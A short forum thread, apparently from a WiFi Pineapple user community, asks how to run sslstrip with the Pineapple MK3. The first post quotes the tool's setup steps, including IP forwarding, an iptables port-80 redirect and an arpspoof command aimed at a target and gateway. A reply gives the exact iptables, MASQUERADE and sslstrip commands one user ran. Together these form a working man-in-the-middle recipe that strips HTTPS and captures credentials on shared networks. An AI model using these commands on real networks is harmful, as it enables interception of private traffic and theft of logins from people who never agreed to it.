Jump to content

Using Sslstrip And The Mk3


Recommended Posts

In order to use sslstrip you have to run some routes to redirect traffic to port 8080 or whatever you will have sslstrop listen on.

Has anyone got this working with the pineapple and linux?

http://www.thoughtcrime.org/software/sslstrip/

Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)

Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)

Run sslstrip. (sslstrip.py -l <listenPort>)

Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

In this situation we don't need to run step one because we are already doing forwarding. Setting up iptables to redirect to port 8080 is the problem I believe because I just want to mirror that traffic and allow it to flow normally too. Also we dont need to do step 4 because we are MITM.

Anyone got this working yet?

Link to comment
Share on other sites

This is what i used on my Fon2100 pineapple with a BT4 laptop back when.

echo 1 &gt; /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
python sslstrip-0.7/sslstrip.py -l 64123 -f sslstrip-0.7/lock.ico

You need to setup forwarding to pass it along.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...